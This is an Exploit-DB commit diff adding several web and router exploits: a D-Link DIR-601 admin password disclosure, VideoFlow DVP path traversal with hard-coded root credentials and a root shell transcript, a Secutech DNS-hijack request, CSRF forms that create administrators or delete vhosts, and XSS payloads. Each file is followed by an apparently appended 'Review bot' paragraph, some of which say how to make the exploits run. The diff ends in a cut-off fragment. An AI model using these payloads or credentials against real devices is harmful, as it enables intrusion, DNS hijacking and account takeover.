DB: 2018-04-03

11 changes to exploits/shellcodes

WebLog Expert Enterprise 9.4 - Privilege Escalation

Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change
Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change

Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery
WampServer 3.1.2 - Cross-Site Request Forgery
VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal
VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials
DLink DIR-601 - Admin Password Disclosure
OpenCMS 10.5.3 - Cross-Site Request Forgery
OpenCMS 10.5.3 - Cross-Site Scripting
Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change
Offensive Security 2018-04-03 05:01:54 +00:00
parent a13c4ea572
commit b6b60b70e9
12 changed files with 781 additions and 3 deletions

@ -0,0 +1,91 @@
VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08
System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.
Desc: The affected device suffers from authenticated remote code execution
vulnerability. Including a CSRF, a remote attacker can exploit this issue
and execute arbitrary system commands granting her system access with root
privileges.
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5455
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
01.02.2018
---
Default credentials (web management):
admin:admin
oper:oper
private:private
public:public
devel:devel
Hard-Coded credentials (ssh):
root:videoflow
mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
-------------------------------- > Tools > System > Shell > --------------------------------
| |
| sh-3.2# id;pwd;uname -a;ls |
| uid=0(root) gid=0(root) |
| /dvp100/confd |
| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
| 86 i686 i386 GNU/Linux |
| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
| sh-3.2# cat /etc/issue |
| CentOS release 5.10 (Final) |
| Kernel \r on an \m |
| |
--------------------------------------------------------------------------------------------
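Review bot: the in-file title (Authenticated Root Remote Code Execution) and the Desc paragraph, which says the issue can be chained with a CSRF, do not match what the file documents: default web credentials, a hard-coded SSH credential, and a shell transcript from Tools > System > Shell, with no CSRF request and no command-execution request shown. Either retitle the file to match the files.csv description (Hard-Coded Credentials) or add the request that reaches the shell. The `mom` entry is a password hash rather than a cleartext credential and should be labelled as such, and "DVP 10" in the title conflicts with "Affected version: 2.10" three lines below.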

@ -0,0 +1,179 @@
# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure
# Google Dork: N/A
# Date: 12/24/2017
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-5708
*Been in contact with William Brown CISO of Dlink and disclosed to the vendor*
1. Description
Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel
2. Proof of Concept
(For proof of concept, the real Admin password is "thisisatest"
Step 1: Access default gateway/router login page
Step 2: Login with Username Admin and put any random password: (This example the password is test)
POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
DNT: 1
Connection: close
request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0
Step 3: Clear Password that was set:
POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
DNT: 1
Connection: close
request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0
Step 4: The following POST request will come back or a variant:
POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
Change the request=no_auth to "request=auth"
POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
DNT: 1
Connection: close
request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
Step 5: Forward the request:
Step 6: Forward the following request:
POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
DNT: 1
Connection: close
request=show_message
Step 7: You will then be presented with the following: "Invalid user name or password, please try again"
Step 8: Click Continue
Step 9: You will see a POST request come back similar to the following:
POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=get_restore_default
Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default"
POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
DNT: 1
Connection: close
request=auth&request=load_settings&table_name=restore_default
Step 11: Forward the request:
Step 12: You will see the following POST request come back or a variant of it:
POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/wizard_default.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver
Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request":
Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest"
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 06 Jan 2018 13:33:26 GMT
Server: lighttpd/1.4.28
Content-Length: 2414
<?xml version="1.0" encoding="UTF-8"?><root><restore_default>0</restore_default><wan_settings><wan_type>0</wan_type><wan_mac>44:8a:5b:8d:ba:13</wan_mac><primary_dns></primary_dns><secondary_dns></secondary_dns><enable_advanced_dns>1</enable_advanced_dns></wan_settings><wan_static><static_ip_addr>0.0.0.0</static_ip_addr><static_subnet_mask>0.0.0.0</static_subnet_mask><static_gateway>0.0.0.0</static_gateway><static_mtu>1500</static_mtu></wan_static><wan_pppoe><pppoe_conn_type>0</pppoe_conn_type><pppoe_user_name></pppoe_user_name><pppoe_user_pwd></pppoe_user_pwd><pppoe_service_name></pppoe_service_name><pppoe_ip_addr>0.0.0.0</pppoe_ip_addr><pppoe_conn_mode>on_demand</pppoe_conn_mode><pppoe_max_idle_time>300</pppoe_max_idle_time><pppoe_mtu>1492</pppoe_mtu></wan_pppoe><wan_pptp><pptp_conn_type>0</pptp_conn_type><pptp_ip_addr>0.0.0.0</pptp_ip_addr><pptp_subnet_mask>0.0.0.0</pptp_subnet_mask><pptp_gateway>0.0.0.0</pptp_gateway><pptp_server_ip></pptp_server_ip><pptp_user_name></pptp_user_name><pptp_user_pwd></pptp_user_pwd><pptp_conn_mode>on_demand</pptp_conn_mode><pptp_max_idle_time>300</pptp_max_idle_time><pptp_mtu>1400</pptp_mtu></wan_pptp><wan_l2tp><l2tp_conn_type>0</l2tp_conn_type><l2tp_ip_addr>0.0.0.0</l2tp_ip_addr><l2tp_subnet_mask>0.0.0.0</l2tp_subnet_mask><l2tp_gateway>0.0.0.0</l2tp_gateway><l2tp_server_ip></l2tp_server_ip><l2tp_user_name></l2tp_user_name><l2tp_user_pwd></l2tp_user_pwd><l2tp_conn_mode>on_demand</l2tp_conn_mode><l2tp_max_idle_time>300</l2tp_max_idle_time><l2tp_mtu>1400</l2tp_mtu></wan_l2tp><wireless_settings><enable_wireless>1</enable_wireless><wireless_schedule>Always</wireless_schedule><ssid>HomeAP</ssid><channel>3</channel><auto_channel>0</auto_channel><dot11_mode>11gn</dot11_mode><channel_width>0</channel_width><ssid_broadcast>1</ssid_broadcast></wireless_settings><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>thisisatest</admin_user_pwd><admin_level>1</admin_level></admin_user><time><zone_index>12</zone_index><time_zone>-80
</time_zone><ntp_enable>1</ntp_enable><ntp_server>time.nist.gov</ntp_server><manual_year>2011</manual_year><manual_month>1</manual_month><manual_day>1</manual_day><manual_hour>0</manual_hour><manual_min>0</manual_min><manual_sec>0</manual_sec></time><fw_ver>2.02NA</fw_ver><build_ver>01</build_ver><fw_date>Tue, 11 Nov 2014</fw_date><fw_region>NA</fw_region><hw_ver>B1</hw_ver></root>
3. Solution:
N/A. Unknown as of the moment
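Review bot: the hand-edited requests carry stale Content-Length headers: Step 3 removes the password value but keeps Content-Length: 74 from Step 2, and Step 10 shortens table_name=get_restore_default to restore_default but keeps Content-Length: 68, so a client that honours the header would send a truncated body. Step 5 ("Forward the request:") and Step 6 also read as one step split in two. The Solution section is "N/A. Unknown as of the moment"; since Steps 4 and 10 show the CGI accepting a client-supplied request=auth in place of request=no_auth, the advisory should at least state that the fix is to derive authorization from the server-side session rather than from the POST body, and that load_settings should never return admin_user_pwd in cleartext to the browser.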

@ -0,0 +1,62 @@
#
#
# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01
# Remote DNS Change PoC
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null
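Review bot: the file is listed as exploits/hardware/webapps/44393.sh, but the only non-comment line is a bare `GET ...` invocation with no shebang, no note that `GET` is the lwp-request client from libwww-perl, and `<TARGET>`, `<DNS1>` and `<DNS2>` left as literal placeholders rather than positional parameters, so it does not run as a shell script as shipped. Add `#!/bin/sh`, take the three values from `$1`, `$2` and `$3`, and drop `2>/dev/null` so HTTP errors are visible. The firmware version in the header (V5.07.52_es_FRI01) is also absent from the files.csv title for this entry.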

@ -0,0 +1,108 @@
VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal
Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08
System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.
Desc: The application suffers from an authenticated arbitrary file disclosure
vulnerability including no session expiration. Input passed via the 'ID' parameter
in several Perl scripts is not properly verified before being used to download
system files. This can be exploited to disclose the contents of arbitrary
files via directory traversal attacks.
Scripts affected:
$ grep -rnH "Content-Disposition" .
./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n";
./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n";
./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n";
./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
----------------------------------------------------------------------------
/dvp100/confd/docroot/cgi-bin/downloadsys.pl:
---------------------------------------------
1 #!/usr/bin/perl -wT
2 # http://www.sitepoint.com/file-download-script-perl/
3
4 use strict;
5 use CGI;
6 use CGI::Carp qw ( fatalsToBrowser );
7 my $files_location;
8 my $query = CGI->new;
9 my $ID = $query->param('ID');
10 my @fileholder;
11
12 $files_location = "/dvp100/confd/docroot/cgi-bin/";
13 #$ID = "syslog.tar.gz"; #param('ID');
14
15 if ($ID eq '') {
16
17 } else {
18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file');
19 @fileholder = <DLFILE>;
20 close (DLFILE) || Error ('close', 'file');
21 print "Content-Type:application/x-download\n";
22 print "Content-Disposition:attachment;filename=$ID\n\n";
23 print @fileholder;
24 }
----------------------------------------------------------------------------
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5454
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
01.02.2018
---
curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
...
...
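Review bot: lines 15 to 24 of the downloadsys.pl listing show why `-wT` in the shebang gives no protection here: Perl's taint checks do not cover opening a file for reading, so the tainted `$ID` flows unchanged into `open(DLFILE, "<$files_location/$ID")`. The fix is to untaint `$ID` against an explicit pattern that forbids directory separators (for example accept only `[A-Za-z0-9._-]+` and reject `..`), or to resolve the path and require it to stay under `$files_location`. The empty `if ($ID eq '') { }` branch should return an error rather than fall through silently, and `Error()` is called on lines 18 and 20 of the listing but not shown. The Desc also claims "no session expiration", but the only supporting evidence is the reused `sessionid` cookie in the curl line; state that as the observation behind the claim.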

@ -0,0 +1,58 @@
# Exploit Title: Cross Site Request Forgery- Frog CMS
# Date: 31-03-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE : CVE-2018-8908
# Category: Webapp CMS
1. Description
The application source code is coded in a way which allows malicious HTML
request to be executed without veryifying source of request.This leads to
arbitary execution with malicous request which will lead to the creation of
a privileged user.
2. Proof of Concept
Visit the application
Visit the Add Users Page.
Craft an html page with all the details for an admin user creation
and host it on a server
Upon the link being clicked by a logged in admin user, immidiately,
another admin user will get created.
Exploit Code:
<html>
<body>
<form action="http://localhost/frog/admin/?/user/add" method="POST">
<input type="hidden" name="user&#91;name&#93;" value="Test&#95;1" />
<input type="hidden" name="user&#91;email&#93;" value="" />
<input type="hidden" name="user&#91;username&#93;" value="test" />
<input type="hidden" name="user&#91;password&#93;" value="test" />
<input type="hidden" name="user&#91;confirm&#93;" value="test" />
<input type="hidden"
name="user&#95;permission&#91;administrator&#93;" value="1" />
<input type="hidden" name="commit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Solution - Fix & Patch: The application code should be configured to
implement anti csrf token to filter malicous HTTP Requests.
4. Public Reference with POC and steps:
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
Thanks and Regards
Samrat
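Review bot: the Description paragraph has several misspellings (veryifying, arbitary, malicous, immidiately), and the Proof of Concept submits an empty `user[email]`, so the note should say whether Frog CMS accepts an empty email on user creation; otherwise the request may be rejected before the administrator flag is honoured. Since the file ships as 44383.html, the surrounding advisory text will render as page content when opened in a browser; move it into an HTML comment or keep the form alone in the .html. The Solution wording "configured to implement anti csrf token" should name the concrete change: a per-session token validated by the /admin/?/user/add POST handler, with SameSite cookies as defence in depth.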

@ -0,0 +1,51 @@
# Exploit Title: WampServer 3.1.1 XSS via CSRF
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.1
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8732
1. Description
XSS: cross site scripting via CSRF is remotely exploitable.
http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615
http://forum.wampserver.com/read.php?2,150617
2. Proof of Concept
How to exploit this XSS vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Go to Supress Virtual host and select one to delete and then intercept
the request using burp suite or any other proxy tool
3. Change the value of parameter *virtual_del[] *to "><img src=x
onerror=alert(1)> and forward it then you will see the XSS triggered.
How to see it:
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="[localhost]; name="wamp_csrf" method="POST">
<input type="hidden" name="virtual&#95;del&#91;&#93;"
value=""><img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;>"
/>
<input type="hidden" name="vhostdelete"
value="Suppress&#32;VirtualHost" />
</form>
</body>
</html>
Warning: action="[localhost] is action='
http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by
double quote("[image: winking smiley]
3. Solution:
Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper
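Review bot: the HTML in this PoC does not parse as written: `<form action="[localhost]; name="wamp_csrf"` leaves the action attribute unterminated, and `value=""><img src=x onerror=alert(1)>"` closes the value attribute at its first character, so the hidden field would submit an empty string. The trailing "Warning" paragraph admits the quoting was mangled in transit; the file should carry the working form directly (a single-quoted value, or `&quot;` inside the double-quoted attribute) and drop the "[image: winking smiley]" mail residue. The title "XSS via CSRF" also differs from the files.csv description "Cross-Site Scripting / Cross-Site Request Forgery"; pick one.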

@ -0,0 +1,47 @@
# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.2
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8817
1. Description
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
2. Proof of Concept
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on
internet and send the link to the victim.
*Exploit Code for deleting any host remotely:*
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english"
name="wamp_csrf" method="POST">
<input type="hidden" name="virtual&#95;del&#91;&#93;"
value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress&#32;VirtualHost"
/>
</form>
</body>
</html>
2. Then run it on your installed vulnerable wampserver.
3. Solution:
Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper
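Review bot: the form action is hard-coded to http://localhost/add_vhost.php?lang=english, so this PoC only fires when the victim opens the page in a browser on the WampServer host itself; the Description's "remote attacker" wording should spell out that precondition. The Exploit Title line is missing a space in "hostsremotely", and the form deletes `localhost` via `virtual_del[]`, which removes the default vhost rather than a test one; a safer PoC would target the vhost created in step 1.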

@ -0,0 +1,73 @@
# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities
Injection
# Google Dork: N/A
# Date: 02-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
# Affected Version: 10.5.3
# Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-8811
1. Vendor Description:
OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
2. Technical Description:
Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
3. Proof Of Concept:
a) Send below crafted request to logged in user who is having Root Administrator level access.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[DomainName]/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
<input type="hidden" name="dialogtype" value="" />
<input type="hidden" name="root" value="" />
<input type="hidden" name="sortcol" value="" />
<input type="hidden" name="preactiondone" value="" />
<input type="hidden" name="oufqn" value="" />
<input type="hidden" name="resource" value="" />
<input type="hidden" name="userid" value="Replace with actual user id of low privileged user." />
<input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
<input type="hidden" name="framename" value="" />
<input type="hidden" name="ispopup" value="" />
<input type="hidden" name="originalparams" value="" />
<input type="hidden" name="message" value="" />
<input type="hidden" name="selitems" value="RoleRootAdmins" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="style" value="new" />
<input type="hidden" name="page" value="" />
<input type="hidden" name="base" value="" />
<input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
<input type="hidden" name="action" value="listmultiaction" />
<input type="hidden" name="searchfilter" value="" />
<input type="hidden" name="redirect" value="" />
<input type="hidden" name="force" value="" />
<input type="hidden" name="formname" value="lsre&#45;form" />
<input type="hidden" name="listaction" value="ma" />
<input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS.
4. Solution:
Upgrade to latest release.
http://www.opencms.org/en/home/news.html
5. Reference:
https://github.com/alkacon/opencms-core/issues/586
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811
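Review bot: the Exploit Title is split across two lines, leaving a stray "Injection" line under the header that belongs to a different template. The `userid` field carries the instruction "Replace with actual user id of low privileged user." as its value; mark it as a placeholder in the same style as `[DomainName]` in the action URL. The Solution ("Upgrade to latest release.") should name the first fixed version or point to the linked issue #586 for the fixing change, so readers can verify whether their install is patched.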

@ -0,0 +1,51 @@
# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability
# Google Dork: N/A
# Date: 02-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
# Affected Version: 10.5.3
# Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-8815
1. Vendor Description:
OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.
2. Technical Description:
Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon
OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or
HTML via a malicious SVG image.
3. Proof Of Concept:
a) Login as user who is having Gallery Editor role.
b) Navigate to gallery and upload below svg file.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
c) Once other user who is having Root Administrator permissions visited the
image link or viewed the uploaded svg image the script get executed.
4. Solution:
Upgrade to latest release.
http://www.opencms.org/en/home/news.html
5. Reference:
https://github.com/alkacon/opencms-core/issues/587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815
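Review bot: the DOCTYPE in the SVG sample is broken across two lines, so the system identifier begins with a newline; join `"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"` onto one line or drop the DOCTYPE, which the sample does not need. Step c) says the script runs when an administrator "visited the image link", which is the detail the fix hinges on: the gallery serves the uploaded SVG inline from the application's origin. The Solution should list the standard mitigations alongside the upgrade: serve gallery uploads from a separate origin or with Content-Disposition: attachment, strip `<script>` elements and event attributes from SVG on upload, and apply a Content-Security-Policy to the gallery path.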

@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually
#!/usr/bin/python
import socket
# Create an array of buffers, from 1 to 5900, with increments of 200.
